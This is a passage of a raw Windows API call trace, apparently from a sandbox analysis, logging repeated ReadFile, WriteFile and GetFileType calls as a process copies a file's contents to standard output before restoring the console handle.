[0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] GetFileType (hFile=0x4c) returned 0x1 [0139.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.545] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, 
lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.546] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.546] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.546] GetFileType (hFile=0x4c) returned 0x1 [0139.546] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, 
lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.547] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.547] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] GetFileType (hFile=0x4c) returned 0x1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.547] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.548] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.548] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, 
lpOverlapped=0x0) returned 1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] GetFileType (hFile=0x4c) returned 0x1 [0139.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.548] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 
| out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] GetFileType (hFile=0x4c) returned 0x1 [0139.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.549] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.549] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.549] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] GetFileType (hFile=0x4c) returned 0x1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.550] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] GetFileType (hFile=0x4c) returned 0x1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0139.551] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.551] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.551] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.551] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] GetFileType (hFile=0x4c) returned 0x1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] GetFileType (hFile=0x4c) returned 0x1 [0139.551] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.551] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] GetFileType (hFile=0x4c) returned 0x1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] GetFileType (hFile=0x4c) returned 0x1 [0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.645] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 
[0139.645] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] GetFileType (hFile=0x4c) returned 0x1 [0139.646] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.646] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.647] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, 
lpNumberOfBytesRead=0x22e370*=0x200, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] WriteFile (in: hFile=0x4c, lpBuffer=0x22f1d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f1d0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] WriteFile (in: hFile=0x4c, lpBuffer=0x22f220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f220*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.647] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.647] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f270*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f2c0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f2c0*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f310*, lpNumberOfBytesWritten=0x22e364*=0x50, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] GetFileType (hFile=0x4c) returned 0x1 [0139.648] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.648] WriteFile (in: hFile=0x4c, lpBuffer=0x22f360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f360*, lpNumberOfBytesWritten=0x22e364*=0x20, lpOverlapped=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.648] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.648] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.649] ReadFile (in: hFile=0x54, lpBuffer=0x22f180, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e370, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesRead=0x22e370*=0x32, lpOverlapped=0x0) returned 1 [0139.649] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.649] GetFileType (hFile=0x4c) returned 0x1 [0139.649] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.649] GetFileType (hFile=0x4c) returned 0x1 [0139.649] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.649] WriteFile (in: hFile=0x4c, lpBuffer=0x22f180*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e364, lpOverlapped=0x0 | out: lpBuffer=0x22f180*, lpNumberOfBytesWritten=0x22e364*=0x32, lpOverlapped=0x0) returned 1 [0139.649] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.649] SetFilePointerEx 
(in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e350 | out: lpNewFilePointer=0x0) returned 1 [0139.649] _close (_FileHandle=4) returned 0 [0139.649] FindNextFileW (in: hFindFile=0x290ee0, lpFindFileData=0x22f3e4 | out: lpFindFileData=0x22f3e4) returned 0 [0139.650] GetLastError () returned 0x12 [0139.650] FindClose (in: hFindFile=0x290ee0 | out: hFindFile=0x290ee0) returned 1 [0139.650] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0139.651] _close (_FileHandle=3) returned 0 [0139.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.651] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.651] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.651] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.651] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: 